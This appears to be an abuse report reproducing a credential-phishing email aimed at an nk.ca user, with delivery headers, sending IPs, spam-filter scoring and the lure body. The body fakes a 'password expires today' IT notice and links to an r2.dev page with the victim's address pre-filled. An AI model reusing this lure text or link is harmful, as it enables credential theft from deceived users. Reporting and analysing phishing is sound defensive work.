Credential phish on nk.ca users from nuxt networks Germany and Krixe Pte in the Netherlands

Return-path:
Envelope-to: aboo@nk.ca
Delivery-date: Tue, 11 Jun 2024 09:08:00 -0600
Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)
    by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))
    (envelope-from )
    id 1sH35i-000000008IN-01TH
    for aboo@nk.ca;
    Tue, 11 Jun 2024 09:07:23 -0600
Received: from [38.255.61.249] (localhost [IPv6:::1])
    by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0
    for ; Tue, 11 Jun 2024 16:40:51 +0200 (CEST)
From: nk.ca
To: aboo@nk.ca
Subject: aboo@nk.ca Password expires notification
Date: 11 Jun 2024 16:40:51 +0200
Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam_score: 21.7
X-Spam_score_int: 217
X-Spam_bar: +++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
    has identified this incoming email as possible spam. The original
    message has been attached to this so you can view it or label
    similar future email. If you have any questions, see
    @@CONTACT_ADDRESS@@ for details.

    Content preview: Dear aboo Your email aboo@nk.ca password expires today. Continue
    with the same password below to avoid disconnection.

    Content analysis details: (21.7 points, 5.0 required)

     pts rule name              description
    ---- ---------------------- --------------------------------------------------
     1.5 RCVD_IN_AHBL           RBL: AHBL: sender is listed in dnsbl.ahbl.org
                                [147.45.197.250 listed in dnsbl.ahbl.org]
                                [147.45.197.250 listed in dnsbl.ahbl.org]
                                [147.45.197.250 listed in dnsbl.ahbl.org]
                                [147.45.197.250 listed in dnsbl.ahbl.org]
     1.5 RCVD_IN_AHBL_SPAM      RBL: AHBL: Spam Source in dnsbl.ahbl.org
                                [147.45.197.250 listed in dnsbl.ahbl.org]
     0.0 RCVD_IN_AHBL_RTB       RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org
                                [147.45.197.250 listed in dnsbl.ahbl.org]
     0.5 RCVD_IN_AHBL_SMTP      RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org
                                [147.45.197.250 listed in dnsbl.ahbl.org]
     0.5 RCVD_IN_AHBL_PROXY     RBL: AHBL: Open Proxy server in dnsbl.ahbl.org
                                [147.45.197.250 listed in dnsbl.ahbl.org]
     1.0 RCVD_IN_WSFF           RBL: Received via a relay in will-spam-for-food.eu.org
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
                                [147.45.197.250 listed in will-spam-for-food.eu.org]
     1.9 URIBL_ABUSE_SURBL      Contains an URL listed in the ABUSE SURBL blocklist
                                [URI: pub-04e98cff18e4472a81f25d74577167d2.r2.dev]
     1.0 SPF_SOFTFAIL           SPF: sender does not match SPF record (softfail)
     0.9 SPF_HELO_SOFTFAIL      SPF: HELO does not match SPF record (softfail)
     1.0 HK_RANDOM_FROM         From username looks random
     0.6 HK_RANDOM_ENVFROM      Envelope sender username looks random
     1.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
     0.0 HTML_MESSAGE           BODY: HTML included in message
     1.3 RDNS_NONE              Delivered to internal network by a host with no rDNS
    -0.0 T_SCC_BODY_TEXT_LINE   No description available.
     0.0 GOOG_REDIR_NORDNS      Google redirect to obscure spamvertised website +
                                no rDNS
     0.7 TO_NO_BRKTS_FROM_MSSP  Multiple formatting errors
     1.5 VOWEL_FROM_6           Impronouncable from header (6 consecutive vowels)
     2.0 PDS_DBL_URL_TNB_RUNON  Double-url and To no arrows, from runon
     0.0 T_FROM_MISSP_DKIM      From misspaced, DKIM dependable
     0.1 TO_IN_SUBJ             To address is in Subject
     0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only
     1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
     2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
                                above 50%
                                [cf: 100]
     0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                                [cf: 100]
     0.0 FSL_BULK_SIG           Bulk signature with no Unsubscribe
Subject: {SPAM?} aboo@nk.ca Password expires notification
X-Antivirus: AVG (VPS 240611-2, 6/11/2024), Inbound message
X-Antivirus-Status: Clean


Dear aboo

Your email aboo@nk.ca password expires today.
Continue with the same password below to avoid disconnection.

[Link: Keep the same password]
    href="https://pub-04e98cff18e4472a81f25d74577167d2.r2.dev/index.html#aboo@nk.ca" target="_blank" rel="noopener noreferrer"
    data-saferedirecturl="https://www.google.com/url?q=https://pub-04e98cff18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=gmail&ust=1718107626365000&usg=AOvVaw3hvrxNopdfFnu_T7hbiJMI"

IT Support

This notification is assigned to aboo@nk.ca.